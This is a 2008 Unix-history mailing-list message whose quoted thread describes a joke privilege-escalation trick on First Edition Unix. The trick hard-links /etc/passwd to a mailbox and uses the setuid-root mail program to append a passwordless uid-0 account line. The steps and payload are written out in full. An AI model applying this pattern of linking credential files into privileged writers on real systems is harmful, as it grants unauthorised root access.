From mboxrd@z Thu Jan 1 00:00:00 1970 From: wb@freebie.xs4all.nl (Wilko Bulte) Date: Sat, 3 May 2008 21:29:43 +0200 Subject: [TUHS] Some fun with 1st ed In-Reply-To: <20080503192359.GA11882@bitmover.com> References: <20080503192359.GA11882@bitmover.com> Message-ID: <20080503192943.GC69106@freebie.xs4all.nl> Quoting Larry McVoy, who wrote on Sat, May 03, 2008 at 12:24:00PM -0700 .. > We need to send out a security alert immediately. This is serious. CERT to the rescue! Man the barricades ! ;-) > On Sat, May 03, 2008 at 09:20:13AM -1000, Tim Newsham wrote: > > All work and no play... > > > > Here's a fun hack for first edition unix. From MAIL (I) : > > > > When followed by the names of a letter and one or more people, the > > letter is appended to each person's mailbox. Each letter is > > preceded by the sender's name and a postmark. > > > > A person is either the nameof an entry in the directory /usr, in > > which case the mail is sent to /usr/person/mailbox, or the path > > of a directory, in which case mailbox in that directory is used. > > > > Mail is setuid root: > > > > # ls -l /bin/mail > > 80 surwr- 1 root 3940 Jan 1 00:00:00 mail > > > > login as a non-root user (ie "bin"), create a file "letter" with the > > contents "hack::0:/:". Run: > > > > @ ln /etc/passwd /tmp/mailbox > > @ mail letter /tmp > > > > log out and log back in as "hack". You are now root. Cat /etc/passwd > > and notice: > > > > From bin Jan 1 00:49:22 > > hack::0:/: > > > > clean up the file a little and enjoy your new elevated status. > > > > Tim Newsham > > http://www.thenewsh.com/~newsham/ > > _______________________________________________ > > TUHS mailing list > > TUHS at minnie.tuhs.org > > https://minnie.tuhs.org/mailman/listinfo/tuhs > > -- > --- > Larry McVoy lm at bitmover.com http://www.bitkeeper.com > _______________________________________________ > TUHS mailing list > TUHS at minnie.tuhs.org > https://minnie.tuhs.org/mailman/listinfo/tuhs --- end of quoted text --- -- Wilko